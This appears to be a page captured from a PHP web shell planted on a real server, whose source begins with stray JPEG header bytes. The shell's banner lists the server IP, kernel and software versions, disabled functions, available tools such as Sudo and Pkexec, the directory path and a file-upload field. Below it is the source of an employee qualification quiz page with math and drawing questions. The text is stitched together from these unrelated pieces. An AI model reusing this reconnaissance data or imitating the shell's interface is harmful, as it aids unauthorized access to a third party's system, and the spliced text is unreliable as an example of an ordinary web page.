????JFIF??x?x????'
| Server IP : 79.136.114.73 / Your IP : 216.73.216.3 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/new_employee2/ |
Upload File : |
<?php
session_start();
$_SESSION['firstname'] = $_POST['firstname'];
$_SESSION['lastname'] = $_POST['lastname'];
$_SESSION['mail'] = $_POST['mail'];
$_SESSION['phone'] = $_POST['phone'];
if($_SESSION['mail'] == ""){
header("location: index.php");
}
?>
<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Astacus Employee Qualification</title>
</head>
<body>
<center>
<table width="1200" border="0" cellspacing="0" cellpadding="0" align="center">
<tbody>
<tr>
<td style="font-family: Gotham, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 18px; text-align: center;"><p> </p>
<span style="text-align: center; font-size: 36px">Welcome to the Astacus Employee Qualification webpage!</span> </p>
<p>TEST 1: Understanding logical structures and math<br>
</p>
<form action="page2.php" method="post" name="form1" id="form1">
<p><strong>Question 1:</strong><br>
Which is greater then 4?<br>
</p>
<table width="700" border="0" align="center" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td style="text-align: center"><input type="radio" name="q1" id="radio22" value="4">
4 </td>
<td style="text-align: center"><input type="radio" name="q1" id="radio23" value="-5">
-5</td>
<td style="text-align: center"><input type="radio" name="q1" id="radio24" value="30/8">
30/8</td>
<td style="text-align: center"><input type="radio" name="q1" id="radio25" value="-8/8">
-8/8</td>
<td style="text-align: center"><input type="radio" name="q1" id="radio26" value="20/4">
20/4</td>
<td style="text-align: center"><input type="radio" name="q1" id="radio27" value="1/2">
1/2</td>
</tr>
</tbody>
</table>
<p><strong><br>
Question 2:</strong><br>
Which is the smallest?<br>
</p>
<table width="700" border="0" align="center" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td width="94" style="text-align: center"><input type="radio" name="q2" id="radio28" value="-1">
-1</td>
<td width="114" style="text-align: center"><input type="radio" name="q2" id="radio29" value="-1/2">
-1/2</td>
<td width="83" style="text-align: center"><input type="radio" name="q2" id="radio30" value="0">
0</td>
<td width="137" style="text-align: center"><input type="radio" name="q2" id="radio31" value="-1/10">
-1/10</td>
<td width="147" style="text-align: center"><input type="radio" name="q2" id="radio32" value="3">
3</td>
<td width="125" style="text-align: center"><input type="radio" name="q2" id="radio33" value="-0.99999...">
-0.99999...</td>
</tr>
</tbody>
</table>
<p><strong><br>
Question 3:</strong><br>
Simplify: X = (4 - 5) - (13 -18 + 2)<br>
</p>
<table width="700" border="0" align="center" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td width="94" style="text-align: center"><input type="radio" name="q3" id="radio34" value="-2">
-2</td>
<td width="114" style="text-align: center"><input type="radio" name="q3" id="radio35" value="2">
2</td>
<td width="83" style="text-align: center"><input type="radio" name="q3" id="radio36" value="-1">
-1</td>
<td width="137" style="text-align: center"><input type="radio" name="q3" id="radio37" value="0">
0</td>
<td width="147" style="text-align: center"><input type="radio" name="q3" id="radio38" value="4">
4</td>
<td width="125" style="text-align: center"><input type="radio" name="q3" id="radio39" value="-4">
-4</td>
</tr>
</tbody>
</table>
<p><strong><br>
Question 4:</strong><br>
The images shows a plan view and a section. The floor height in point A is +0.0 (meters). The riser heigth is 200 mm. What value should be entered in point B?</p>
<p><img src="images/q1b.png" width="1200" height="382" alt=""/></p>
<table width="700" border="0" align="center" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td style="text-align: center"><input type="radio" name="q4" id="radio" value="+1.4">
+1.4 </td>
<td style="text-align: center"><input type="radio" name="q4" id="radio2" value="+0.0">
+0.0</td>
<td style="text-align: center"><input type="radio" name="q4" id="radio3" value="-1.2">
-1.2</td>
<td style="text-align: center"><input type="radio" name="q4" id="radio4" value="+1.6">
+1.6</td>
<td style="text-align: center"><input type="radio" name="q4" id="radio5" value="+1.600">
+1.600</td>
<td style="text-align: center"><input type="radio" name="q4" id="radio6" value="-1.4">
-1.4</td>
</tr>
</tbody>
</table>
<p><strong><br>
Question 5:</strong><br>
The area of a room is 25 m2. If the distance between the slabs are 3 m, what is the total volume of the room in cubic meters?<table width="700" border="0" align="center" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td style="text-align: center"><input type="radio" name="q5" id="radio7" value="60m3">
60 m3</td>
<td style="text-align: center"><input type="radio" name="q5" id="radio8" value="7.5 m3">
7.5 m3</td>
<td style="text-align: center"><input type="radio" name="q5" id="radio9" value="25 m3">
25 m3</td>
<td style="text-align: center"><input type="radio" name="q5" id="radio10" value="75 m3">
75 m3</td>
<td style="text-align: center"><input type="radio" name="q5" id="radio11" value="7500 m3">
7500 m3</td>
<td style="text-align: center"><input type="radio" name="q5" id="radio12" value="50 m3">
50 m3</td>
</tr>
</tbody>
</table>
<p><strong><br>
Question 6</strong><br>
What is the best desciption of quality?
</p>
<table width="700" border="0" align="center" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td width="270" style="text-align: center"><input type="radio" name="q6" id="radio13" value="A general standard (ISO 9001)">
A general standard (ISO 9001)</td>
<td width="263" style="text-align: center"><input type="radio" name="q6" id="radio16" value="Finding missing objects">
Finding missing objects</td>
<td width="167" style="text-align: center"><input type="radio" name="q6" id="radio18" value="Consistent work">
Consistent work</td>
</tr>
</tbody>
</table>
<p><strong><br>
Question 7:</strong><br>
If you are asked to update the file as for the below image, what will you do?<br>
<img src="images/q4.png" width="900" height="563" alt=""/> </p>
<table width="705" border="0" align="center" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td width="69"><span style="text-align: center">
<input type="radio" name="q7" id="radio19" value="Tell that its not possible since you don't understand the instructions.">
</span></td>
<td width="427" align="left">Tell that its not possible since you don't understand the instructions.</td>
</tr>
<tr>
<td><span style="text-align: center">
<input type="radio" name="q7" id="radio20" value="Update room names to the text in drawing.">
</span></td>
<td align="left">Update room names to the text in drawing.</td>
</tr>
<tr>
<td><span style="text-align: center">
<input type="radio" name="q7" id="radio21" value="Update room names to the text in drawing and make the walls solid in the marked area">
</span></td>
<td align="left">Update room names to the text in drawing and make the walls solid in the marked area.</td>
</tr>
</tbody>
</table>
<hr>
<p><br>
</p>
<p> <br>
</p>
<p>
<input type="submit" name="submit" id="submit" value="Submit all the answers and continue to TEST 2.">
</p>
<p><br>
</p>
</form>
<p> </p></td>
</tr>
</tbody>
</table>
</center>
</body>
</html>